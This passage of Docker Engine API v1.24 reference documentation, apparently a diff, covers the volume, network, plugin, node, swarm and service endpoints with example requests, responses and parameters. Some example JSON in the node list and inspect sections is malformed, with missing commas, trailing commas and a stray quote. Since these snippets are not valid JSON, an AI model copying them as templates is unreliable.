+ +**Example request**: + + DELETE /v1.24/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 3.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.24/networks?filters={"type":{"custom":true}} HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query 
parameters**: + +- **filters** - JSON encoded network list filter. The filter value is one of: + - `driver=` Matches a network's driver. + - `id=` Matches all or part of a network id. + - `label=` or `label==` of a network label. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.24/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "net01", + "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.19.0.0/16", + "Gateway": "172.19.0.1" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal": false, + "Containers": { + "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": { + "Name": "test", + "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a", + "MacAddress": "02:42:ac:13:00:02", + "IPv4Address": "172.19.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST 
/v1.24/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "EnableIPv6": true, + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + }, + { + "Subnet":"2001:db8:abcd::/64", + "Gateway":"2001:db8:abcd::1011" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal":true, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **403** - operation not supported for pre-defined networks +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **Internal** - Restrict external access to the network +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. 
Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` + - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}` +- **EnableIPv6** - Enable IPv6 on the network +- **Options** - Network specific options to be used by the drivers +- **Labels** - Labels to set on the network, specified as a map: `{"key":"value" [,"key2":"value2"]}` + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "EndpointConfig": { + "IPAMConfig": { + "IPv4Address":"172.24.56.89", + "IPv6Address":"2001:db8::5689" + } + } +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **403** - operation not supported for swarm scoped networks +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "Force":false +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **403** - operation not supported for swarm scoped networks +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network +- **Force** - Force the container to disconnect from a network + +#### 
Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). + +**Example request**: + + DELETE /v1.24/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such network +- **500** - server error + +### 3.6 Plugins (experimental) + +#### List plugins + +`GET /plugins` + +Returns information about installed plugins. + +**Example request**: + + GET /v1.24/plugins HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Id": "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078", + "Name": "tiborvass/no-remove", + "Tag": "latest", + "Active": true, + "Config": { + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Env": [ + "DEBUG=1" + ], + "Args": null, + "Devices": null + }, + "Manifest": { + "ManifestVersion": "v0", + "Description": "A test plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Interface": { + "Types": [ + "docker.volumedriver/1.0" + ], + "Socket": "plugins.sock" + }, + "Entrypoint": [ + "plugin-no-remove", + "/data" + ], + "Workdir": "", + "User": { + }, + "Network": { + "Type": "host" + }, + "Capabilities": null, + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Devices": [ + { + "Name": "device", + "Description": "a 
host device to mount", + "Settable": null, + "Path": "/dev/cpu_dma_latency" + } + ], + "Env": [ + { + "Name": "DEBUG", + "Description": "If set, prints debug messages", + "Settable": null, + "Value": "1" + } + ], + "Args": { + "Name": "args", + "Description": "command line arguments", + "Settable": null, + "Value": [ + + ] + } + } + } +] +``` + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Install a plugin + +`POST /plugins/pull?name=` + +Pulls and installs a plugin. After the plugin is installed, it can be enabled +using the [`POST /plugins/(plugin name)/enable` endpoint](#enable-a-plugin). + +**Example request**: + +``` +POST /v1.24/plugins/pull?name=tiborvass/no-remove:latest HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. When using +this endpoint to pull a plugin from the registry, the `X-Registry-Auth` header +can be used to include a base64-encoded AuthConfig object. Refer to the [create +an image](#create-an-image) section for more details. + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json +Content-Length: 175 + +[ + { + "Name": "network", + "Description": "", + "Value": [ + "host" + ] + }, + { + "Name": "mount", + "Description": "", + "Value": [ + "/data" + ] + }, + { + "Name": "device", + "Description": "", + "Value": [ + "/dev/cpu_dma_latency" + ] + } +] +``` + +**Query parameters**: + +- **name** - Name of the plugin to pull. The name may include a tag or digest. + This parameter is required. + +**Status codes**: + +- **200** - no error +- **500** - error parsing reference / not a valid repository/tag: repository + name must have at least one component +- **500** - plugin already exists + +#### Inspect a plugin + +`GET /plugins/(plugin name)` + +Returns detailed information about an installed plugin. + +**Example request**: + +``` +GET /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. 
+ + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Id": "5724e2c8652da337ab2eedd19fc6fc0ec908e4bd907c7421bf6a8dfc70c4c078", + "Name": "tiborvass/no-remove", + "Tag": "latest", + "Active": false, + "Config": { + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Env": [ + "DEBUG=1" + ], + "Args": null, + "Devices": null + }, + "Manifest": { + "ManifestVersion": "v0", + "Description": "A test plugin for Docker", + "Documentation": "https://docs.docker.com/engine/extend/plugins/", + "Interface": { + "Types": [ + "docker.volumedriver/1.0" + ], + "Socket": "plugins.sock" + }, + "Entrypoint": [ + "plugin-no-remove", + "/data" + ], + "Workdir": "", + "User": { + }, + "Network": { + "Type": "host" + }, + "Capabilities": null, + "Mounts": [ + { + "Name": "", + "Description": "", + "Settable": null, + "Source": "/data", + "Destination": "/data", + "Type": "bind", + "Options": [ + "shared", + "rbind" + ] + }, + { + "Name": "", + "Description": "", + "Settable": null, + "Source": null, + "Destination": "/foobar", + "Type": "tmpfs", + "Options": null + } + ], + "Devices": [ + { + "Name": "device", + "Description": "a host device to mount", + "Settable": null, + "Path": "/dev/cpu_dma_latency" + } + ], + "Env": [ + { + "Name": "DEBUG", + "Description": "If set, prints debug messages", + "Settable": null, + "Value": "1" + } + ], + "Args": { + "Name": "args", + "Description": "command line arguments", + "Settable": null, + "Value": [ + + ] + } + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - plugin not installed + +#### Enable a plugin + +`POST /plugins/(plugin name)/enable` + +Enables a plugin + +**Example request**: + +``` +POST 
/v1.24/plugins/tiborvass/no-remove:latest/enable HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Length: 0 +Content-Type: text/plain; charset=utf-8 +``` + +**Status codes**: + +- **200** - no error +- **500** - plugin is already enabled + +#### Disable a plugin + +`POST /plugins/(plugin name)/disable` + +Disables a plugin + +**Example request**: + +``` +POST /v1.24/plugins/tiborvass/no-remove:latest/disable HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Length: 0 +Content-Type: text/plain; charset=utf-8 +``` + +**Status codes**: + +- **200** - no error +- **500** - plugin is already disabled + +#### Remove a plugin + +`DELETE /plugins/(plugin name)` + +Removes a plugin + +**Example request**: + +``` +DELETE /v1.24/plugins/tiborvass/no-remove:latest HTTP/1.1 +``` + +The `:latest` tag is optional, and is used as default if omitted. + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Length: 0 +Content-Type: text/plain; charset=utf-8 +``` + +**Status codes**: + +- **200** - no error +- **404** - plugin not installed +- **500** - plugin is active + + + +### 3.7 Nodes + +**Note**: Node operations require the engine to be part of a swarm. 
+ +#### List nodes + + +`GET /nodes` + +List nodes + +**Example request**: + + GET /v1.24/nodes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "ID": "24ifsmvkjbyhk", + "Version": { + "Index": 8 + }, + "CreatedAt": "2016-06-07T20:31:11.853781916Z", + "UpdatedAt": "2016-06-07T20:31:11.999868824Z", + "Spec": { + "Name": "my-node", + "Role": "manager", + "Availability": "active" + "Labels": { + "foo": "bar" + } + }, + "Description": { + "Hostname": "bf3067039e47", + "Platform": { + "Architecture": "x86_64", + "OS": "linux" + }, + "Resources": { + "NanoCPUs": 4000000000, + "MemoryBytes": 8272408576 + }, + "Engine": { + "EngineVersion": "1.12.0", + "Labels": { + "foo": "bar", + } + "Plugins": [ + { + "Type": "Volume", + "Name": "local" + }, + { + "Type": "Network", + "Name": "bridge" + } + { + "Type": "Network", + "Name": "null" + } + { + "Type": "Network", + "Name": "overlay" + } + ] + } + }, + "Status": { + "State": "ready" + }, + "ManagerStatus": { + "Leader": true, + "Reachability": "reachable", + "Addr": "172.17.0.2:2377"" + } + } + ] + +**Query parameters**: + +- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the + nodes list. 
Available filters: + - `id=` + - `label=` + - `membership=`(`accepted`|`pending`)` + - `name=` + - `role=`(`manager`|`worker`)` + +**Status codes**: + +- **200** – no error +- **406** - node is not part of a swarm +- **500** – server error + +#### Inspect a node + + +`GET /nodes/(id or name)` + +Return low-level information on the node `id` + +**Example request**: + + GET /v1.24/nodes/24ifsmvkjbyhk HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "ID": "24ifsmvkjbyhk", + "Version": { + "Index": 8 + }, + "CreatedAt": "2016-06-07T20:31:11.853781916Z", + "UpdatedAt": "2016-06-07T20:31:11.999868824Z", + "Spec": { + "Name": "my-node", + "Role": "manager", + "Availability": "active" + "Labels": { + "foo": "bar" + } + }, + "Description": { + "Hostname": "bf3067039e47", + "Platform": { + "Architecture": "x86_64", + "OS": "linux" + }, + "Resources": { + "NanoCPUs": 4000000000, + "MemoryBytes": 8272408576 + }, + "Engine": { + "EngineVersion": "1.12.0", + "Labels": { + "foo": "bar", + } + "Plugins": [ + { + "Type": "Volume", + "Name": "local" + }, + { + "Type": "Network", + "Name": "bridge" + } + { + "Type": "Network", + "Name": "null" + } + { + "Type": "Network", + "Name": "overlay" + } + ] + } + }, + "Status": { + "State": "ready" + }, + "ManagerStatus": { + "Leader": true, + "Reachability": "reachable", + "Addr": "172.17.0.2:2377"" + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such node +- **406** – node is not part of a swarm +- **500** – server error + +#### Remove a node + + +`DELETE /nodes/(id or name)` + +Remove a node from the swarm. + +**Example request**: + + DELETE /v1.24/nodes/24ifsmvkjbyhk HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **force** - 1/True/true or 0/False/false, Force remove a node from the swarm. + Default `false`. 
+ +**Status codes**: + +- **200** – no error +- **404** – no such node +- **406** – node is not part of a swarm +- **500** – server error + +#### Update a node + + +`POST /nodes/(id)/update` + +Update a node. + +The payload of the `POST` request is the new `NodeSpec` and +overrides the current `NodeSpec` for the specified node. + +If `Availability` or `Role` are omitted, this returns an +error. Any other field omitted resets the current value to either +an empty value or the default cluster-wide value. + +**Example Request** + + POST /v1.24/nodes/24ifsmvkjbyhk/update?version=8 HTTP/1.1 + Content-Type: application/json + + { + "Availability": "active", + "Name": "node-name", + "Role": "manager", + "Labels": { + "foo": "bar" + } + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **version** – The version number of the node object being updated. This is + required to avoid conflicting writes. + +JSON Parameters: + +- **Annotations** – Optional metadata to associate with the node. + - **Name** – User-defined name for the node. + - **Labels** – A map of labels to associate with the node (e.g., + `{"key":"value", "key2":"value2"}`). +- **Role** - Role of the node (worker/manager). +- **Availability** - Availability of the node (active/pause/drain). 
+ + +**Status codes**: + +- **200** – no error +- **404** – no such node +- **406** – node is not part of a swarm +- **500** – server error + +### 3.8 Swarm + +#### Inspect swarm + + +`GET /swarm` + +Inspect swarm + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "CreatedAt" : "2016-08-15T16:00:20.349727406Z", + "Spec" : { + "Dispatcher" : { + "HeartbeatPeriod" : 5000000000 + }, + "Orchestration" : { + "TaskHistoryRetentionLimit" : 10 + }, + "CAConfig" : { + "NodeCertExpiry" : 7776000000000000 + }, + "Raft" : { + "LogEntriesForSlowFollowers" : 500, + "HeartbeatTick" : 1, + "SnapshotInterval" : 10000, + "ElectionTick" : 3 + }, + "TaskDefaults" : {}, + "Name" : "default" + }, + "JoinTokens" : { + "Worker" : "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-6qmn92w6bu3jdvnglku58u11a", + "Manager" : "SWMTKN-1-1h8aps2yszaiqmz2l3oc5392pgk8e49qhx2aj3nyv0ui0hez2a-8llk83c4wm9lwioey2s316r9l" + }, + "ID" : "70ilmkj2f6sp2137c753w2nmt", + "UpdatedAt" : "2016-08-15T16:32:09.623207604Z", + "Version" : { + "Index" : 51 + } + } + +**Status codes**: + +- **200** - no error +- **406** – node is not part of a swarm +- **500** - server error + +#### Initialize a new swarm + + +`POST /swarm/init` + +Initialize a new swarm. The body of the HTTP response includes the node ID. 
+ +**Example request**: + + POST /v1.24/swarm/init HTTP/1.1 + Content-Type: application/json + + { + "ListenAddr": "0.0.0.0:2377", + "AdvertiseAddr": "192.168.1.1:2377", + "ForceNewCluster": false, + "Spec": { + "Orchestration": {}, + "Raft": {}, + "Dispatcher": {}, + "CAConfig": {} + } + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 28 + Content-Type: application/json + Date: Thu, 01 Sep 2016 21:49:13 GMT + Server: Docker/1.12.0 (linux) + + "7v2t30z9blmxuhnyo6s4cpenp" + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **406** – node is already part of a swarm +- **500** - server error + +JSON Parameters: + +- **ListenAddr** – Listen address used for inter-manager communication, as well as determining + the networking interface used for the VXLAN Tunnel Endpoint (VTEP). This can either be an + address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port + number, like `eth0:4567`. If the port number is omitted, the default swarm listening port is + used. +- **AdvertiseAddr** – Externally reachable address advertised to other nodes. This can either be + an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port + number, like `eth0:4567`. If the port number is omitted, the port number from the listen + address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when + possible. +- **ForceNewCluster** – Force creation of a new swarm. +- **Spec** – Configuration settings for the new swarm. + - **Orchestration** – Configuration settings for the orchestration aspects of the swarm. + - **TaskHistoryRetentionLimit** – Maximum number of tasks history stored. + - **Raft** – Raft related configuration. + - **SnapshotInterval** – Number of logs entries between snapshot. + - **KeepOldSnapshots** – Number of snapshots to keep beyond the current snapshot. 
+ - **LogEntriesForSlowFollowers** – Number of log entries to keep around to sync up slow + followers after a snapshot is created. + - **HeartbeatTick** – Amount of ticks (in seconds) between each heartbeat. + - **ElectionTick** – Amount of ticks (in seconds) needed without a leader to trigger a new + election. + - **Dispatcher** – Configuration settings for the task dispatcher. + - **HeartbeatPeriod** – The delay for an agent to send a heartbeat to the dispatcher. + - **CAConfig** – Certificate authority configuration. + - **NodeCertExpiry** – Automatic expiry for nodes certificates. + - **ExternalCA** - Configuration for forwarding signing requests to an external + certificate authority. + - **Protocol** - Protocol for communication with the external CA + (currently only "cfssl" is supported). + - **URL** - URL where certificate signing requests should be sent. + - **Options** - An object with key/value pairs that are interpreted + as protocol-specific options for the external CA driver. + +#### Join an existing swarm + +`POST /swarm/join` + +Join an existing swarm + +**Example request**: + + POST /v1.24/swarm/join HTTP/1.1 + Content-Type: application/json + + { + "ListenAddr": "0.0.0.0:2377", + "AdvertiseAddr": "192.168.1.1:2377", + "RemoteAddrs": ["node1:2377"], + "JoinToken": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **406** – node is already part of a swarm +- **500** - server error + +JSON Parameters: + +- **ListenAddr** – Listen address used for inter-manager communication if the node gets promoted to + manager, as well as determining the networking interface used for the VXLAN Tunnel Endpoint (VTEP). +- **AdvertiseAddr** – Externally reachable address advertised to other nodes. 
This can either be + an address/port combination in the form `192.168.1.1:4567`, or an interface followed by a port + number, like `eth0:4567`. If the port number is omitted, the port number from the listen + address is used. If `AdvertiseAddr` is not specified, it will be automatically detected when + possible. +- **RemoteAddrs** – Addresses of manager nodes already participating in the swarm. +- **JoinToken** – Secret token for joining this swarm. + +#### Leave a swarm + + +`POST /swarm/leave` + +Leave a swarm + +**Example request**: + + POST /v1.24/swarm/leave HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **force** - Boolean (0/1, false/true). Force leave swarm, even if this is the last manager or that it will break the cluster. + +**Status codes**: + +- **200** – no error +- **406** – node is not part of a swarm +- **500** - server error + +#### Update a swarm + + +`POST /swarm/update` + +Update a swarm + +**Example request**: + + POST /v1.24/swarm/update HTTP/1.1 + + { + "Name": "default", + "Orchestration": { + "TaskHistoryRetentionLimit": 10 + }, + "Raft": { + "SnapshotInterval": 10000, + "LogEntriesForSlowFollowers": 500, + "HeartbeatTick": 1, + "ElectionTick": 3 + }, + "Dispatcher": { + "HeartbeatPeriod": 5000000000 + }, + "CAConfig": { + "NodeCertExpiry": 7776000000000000 + }, + "JoinTokens": { + "Worker": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx", + "Manager": "SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2" + } + } + + +**Example response**: + + HTTP/1.1 200 OK + Content-Length: 0 + Content-Type: text/plain; charset=utf-8 + +**Query parameters**: + +- **version** – The version number of the swarm object being updated. This is + required to avoid conflicting writes. +- **rotateWorkerToken** - Set to `true` (or `1`) to rotate the worker join token. 
+ +- **rotateManagerToken** - Set to `true` (or `1`) to rotate the manager join token. + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **406** – node is not part of a swarm +- **500** - server error + +JSON Parameters: + +- **Orchestration** – Configuration settings for the orchestration aspects of the swarm. + - **TaskHistoryRetentionLimit** – Maximum number of tasks history stored. +- **Raft** – Raft related configuration. + - **SnapshotInterval** – Number of logs entries between snapshot. + - **KeepOldSnapshots** – Number of snapshots to keep beyond the current snapshot. + - **LogEntriesForSlowFollowers** – Number of log entries to keep around to sync up slow + followers after a snapshot is created. + - **HeartbeatTick** – Amount of ticks (in seconds) between each heartbeat. + - **ElectionTick** – Amount of ticks (in seconds) needed without a leader to trigger a new + election. +- **Dispatcher** – Configuration settings for the task dispatcher. + - **HeartbeatPeriod** – The delay for an agent to send a heartbeat to the dispatcher. +- **CAConfig** – CA configuration. + - **NodeCertExpiry** – Automatic expiry for nodes certificates. + - **ExternalCA** - Configuration for forwarding signing requests to an external + certificate authority. + - **Protocol** - Protocol for communication with the external CA + (currently only "cfssl" is supported). + - **URL** - URL where certificate signing requests should be sent. + - **Options** - An object with key/value pairs that are interpreted + as protocol-specific options for the external CA driver. +- **JoinTokens** - Tokens that can be used by other nodes to join the swarm. + - **Worker** - Token to use for joining as a worker. + - **Manager** - Token to use for joining as a manager. + +### 3.9 Services + +**Note**: Service operations require the engine to first be part of a swarm. 
+ +#### List services + + +`GET /services` + +List services + +**Example request**: + + GET /v1.24/services HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "ID": "9mnpnzenvg8p8tdbtq4wvbkcz", + "Version": { + "Index": 19 + }, + "CreatedAt": "2016-06-07T21:05:51.880065305Z", + "UpdatedAt": "2016-06-07T21:07:29.962229872Z", + "Spec": { + "Name": "hopeful_cori", + "TaskTemplate": { + "ContainerSpec": { + "Image": "redis" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": { + "Constraints": [ + "node.role == worker" + ] + } + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": { + "Parallelism": 1, + "FailureAction": "pause" + }, + "EndpointSpec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + } + }, + "Endpoint": { + "Spec": { + "Mode": "vip", + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ] + }, + "Ports": [ + { + "Protocol": "tcp", + "TargetPort": 6379, + "PublishedPort": 30001 + } + ], + "VirtualIPs": [ + { + "NetworkID": "4qvuz4ko70xaltuqbt8956gd1", + "Addr": "10.255.0.2/16" + }, + { + "NetworkID": "4qvuz4ko70xaltuqbt8956gd1", + "Addr": "10.255.0.3/16" + } + ] + } + } + ] + +**Query parameters**: + +- **filters** – a JSON encoded value of the filters (a `map[string][]string`) to process on the + services list. Available filters: + - `id=` + - `label=` + - `name=` + +**Status codes**: + +- **200** – no error +- **406** – node is not part of a swarm +- **500** – server error + +#### Create a service + +`POST /services/create` + +Create a service. When using this endpoint to create a service using a private +repository from the registry, the `X-Registry-Auth` header must be used to +include a base64-encoded AuthConfig object. 
Refer to the [create an +image](#create-an-image) section for more details. + +**Example request**: + + POST /v1.24/services/create HTTP/1.1 + Content-Type: application/json + + { + "Name": "web", + "TaskTemplate": { + "ContainerSpec": { + "Image": "nginx:alpine", + "Mounts": [ + { + "ReadOnly": true, + "Source": "web-data", + "Target": "/usr/share/nginx/html", + "Type": "volume", + "VolumeOptions": { + "DriverConfig": { + }, + "Labels": { + "com.example.something": "something-value" + } + } + } + ], + "User": "33" + }, + "Networks": [ + { + "Target": "overlay1" + } + ], + "LogDriver": { + "Name": "json-file", + "Options": { + "max-file": "3", + "max-size": "10M" + } + }, + "Placement": { + "Constraints": [ + "node.role == worker" + ] + }, + "Resources": { + "Limits": { + "MemoryBytes": 104857600 + }, + "Reservations": { + } + }, + "RestartPolicy": { + "Condition": "on-failure", + "Delay": 10000000000, + "MaxAttempts": 10 + } + }, + "Mode": { + "Replicated": { + "Replicas": 4 + } + }, + "UpdateConfig": { + "Delay": 30000000000, + "Parallelism": 2, + "FailureAction": "pause" + }, + "EndpointSpec": { + "Ports": [ + { + "Protocol": "tcp", + "PublishedPort": 8080, + "TargetPort": 80 + } + ] + }, + "Labels": { + "foo": "bar" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "ID":"ak7w3gjqoa3kuz8xcpnyy0pvl" + } + +**Status codes**: + +- **201** – no error +- **403** - network is not eligible for services +- **406** – node is not part of a swarm +- **409** – name conflicts with an existing object +- **500** - server error + +**JSON Parameters**: + +- **Name** – User-defined name for the service. +- **Labels** – A map of labels to associate with the service (e.g., `{"key":"value", "key2":"value2"}`). +- **TaskTemplate** – Specification of the tasks to start as part of the new service. + - **ContainerSpec** - Container settings for containers started as part of this task. 
